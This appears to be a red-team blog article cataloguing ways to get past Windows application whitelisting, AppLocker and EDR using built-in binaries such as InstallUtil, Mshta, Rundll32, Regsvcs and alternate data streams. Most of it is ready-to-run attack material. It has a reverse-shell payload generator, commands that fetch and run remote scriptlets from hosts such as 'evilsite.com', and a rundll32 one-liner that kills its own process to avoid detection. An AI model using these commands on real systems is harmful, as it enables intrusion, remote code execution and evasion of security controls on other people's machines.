image

through a red teaming assessment you may face some of the restriction due to policy enforcement / EDR / app whitelisting ..etc., so in this article, I am going to cover most of the techniques that may be useful to bypass environment restrictions

abusing writable paths

on some of the windows ten builds there are some of writable folders paths could be harmed by changing the ownership (ACL)  of the desired location which includes executing rights If binary deny executing is inherit you can either disabled inheritance, or you can use the hard link to a binary

fsutil hardlink create c:\windows\system32\fxstmp\evil.exe c:\myfolder\linked.exe 

mklink /h c:\windows\system32\fxstmp\evil.exe c:\myfolder\linked.exe

also, I highly recommend checking for  writable folders with the current level of permission using 0xsp mongoose -W option

Bypass Applications Whitelisting

Alternative Data Streams App Locker

after installation of app locker on a windows machine the first login user will be able to access these files locations as below  with full access

AppCache.dat
AppCache.dat.LOG1
AppCache.dat.LOG2

abusing these files could be done using alternative data stream execution since the app locker locks these files. so you may need to execute the following these instructions

  • adding binary into the stream
type evilfile.exe > C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe
  • calling wait to call the process
wmic process call create 'C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe'

you may also consider the following list of commands with the same scope of attack methodology

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o

powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"

curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe

cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

Installutil.exe (T1118)

 a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe

we can use this technique to generate C# shellcode with this tool, then we can upload the generated file into the target machine

python InstallUtil.py --cs_file temp.cs --exe_file temp.exe --payload windows/shell_reverse_tcp --lhost 192.168.68.104 --lport 443

compile C# code using cs.exe

csc.exe temp.cs

finally, you can execute the payload with the following command

.\InstallUtil.exe /logfile= /LogToConsole=false /U temp.cs

image

Presentationhost.exe (T1218)

The presentation host is a built-in windows executable that used as Proxy execution of code through XAML Browser Application, by loading xbap file into a specific process. opening a .xbap file appears to launch the application inside Internet Explorer, but the code is running in another process (Presentationhost.exe) for POC demonstration you may use the following code

private void Button_click(object sender, RoutedEventArgs e)
{
    if (RadioButton1.IsChecked == true)
    {
        Process.Start("C:\\poc\\evil.exe");
        MessageBox.Show("BHello.");
    }
}

then you can execute the following payload

Presentationhost.exe file:///tmp/poc.xbap

also put into consideration that in case it doesn't work due to security validation it is better to do it through visual studio you can check out this article

Regsvcs.exe / Regasm (T1121)

Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies.

demonstration of this attack by executing the following commands

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}

you may also achieve that by executing some of PowerShell command lines

$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content $env:Temp\key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library /keyfile:$env:Temp\key.snk #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{output_file}

Mshta.exe (T1170)

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications).

from different aspects we can use this utility to launch a different kind of attacks that could bypass restrictions made into an environment, the first common one is by using scriptlet file .sct

let us first generate our payload to use

<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>

<public>
    <method name="Exec"></method>
</public>

<script language="JScript">
<![CDATA[
    function Exec() {
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    }
]]>
</script>
</scriptlet>

then save it as payload.sct for an example, after that you can simply call it through mshta process

 mshta.exe javascript:a=(GetObject("script:http://192.168.68.104/payload.sct")).Exec();close();

image

Rundll32

as well known this can be used differently, the first command is using DLL with slandered UNC path, but in this case we are using rundll32 to execute a payload stored in webdav server

rundll32 \\webdavserver\folder\payload.dll,entrypoint

the other payload is by calling inline-script also using payload.sct that we used before

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

we can also consider using this tricky payload to execute a process and then killing the rundll32.exe process after final execution, that's very helpful to avoid detection in some cases

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

while on the other hand we still can use rundll32 to bypass the restriction by creating process depending on registered system DLLs entry points

rundll32.exe advpack.dll,RegisterOCX calc.exe

rundll32.exe zipfldr.dll,RouteTheCall calc.exe

rundll32.exe url.dll,OpenURL "C:\test\calc.hta"

rundll32.exe url.dll, FileProtocolHandler calc.exe

rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"

rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,1,